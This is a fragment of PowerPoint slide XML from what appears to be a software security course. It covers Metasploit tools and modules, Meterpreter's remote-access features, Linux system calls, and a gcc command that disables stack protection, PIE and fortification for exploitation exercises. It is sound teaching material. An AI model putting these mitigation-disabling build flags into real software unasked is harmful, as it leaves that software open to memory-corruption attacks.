              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfcli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command line interface for scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload generation utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nasm_shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembly manipulation shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873571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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Modules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Modules are sub-components that can be leveraged to carry out specific tasks (e.g., scanning for a service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> provides dozens of modules, including</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Admin: HTTP, MSSQL, MySQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, VMware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning: DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, NetBIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMware, VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server: FTP, IMAP, POP, SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="568274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Invoking System Calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System calls are usually invoked through libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux/x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204890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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Console</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err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command is the most common way to access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Payload caught by AV? Fly under the radar with Dynamic Payloads in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Pro -- learn more on http://rapid7.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>       =[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> v4.11.4-2015071403                   ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ 432 payloads - 37 encoders - 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>             ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>+ -- --=[ Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> Pro trial: http://r-7.co/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>trymsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &gt; show</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1130314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Meterpreter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err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a payload that has advanced features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Completely resides in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides remote access through an encrypted connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports a wide variety of commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Core commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File system commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User interface commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Privacy commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5593089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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications can be exploited by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>roviding unexpected inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generating unexpected environmental conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitizing user inputs and understanding environmental dependencies is key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The use of safe coding, safe languages, and existing protection mechanisms can greatly reduce the risk of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application-logic attacks are still possible </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7694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err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-w -O0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ggdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=c99 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>–static </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-m32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-omit-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-pointer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>PIC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-stack-boundary=2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>D_FORTIFY_SOURCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-format-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2121363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World!</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>string "Hello World\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$4,%eax	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
